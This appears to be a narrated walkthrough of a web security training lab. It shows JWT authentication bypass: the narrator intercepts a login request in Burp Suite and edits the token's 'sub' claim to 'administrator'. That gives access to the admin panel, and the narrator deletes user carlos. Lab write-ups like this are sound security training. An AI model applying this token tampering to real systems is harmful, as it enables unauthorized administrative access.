now we have a website that contain a JWT

now let’s go and try to login

okay hit login

as we can see we are logged in as the user wiener now let’s open burpsuite and intercept the request

as we can see the JWT Editor Extension identified that there is a JWT in this request

now let’s send it to the repeater and open the JWT Editor

as we see the payload section of the JWT contain sub that is holding the current username that is logged in

now what will happen if there we change the value of it to administrator

as we can see we got the admin panel as an option in the new JWT

now let’s open the response in browser

as we can see we are in /admin endpoint and we successfully deleted the user carlos and solved the lab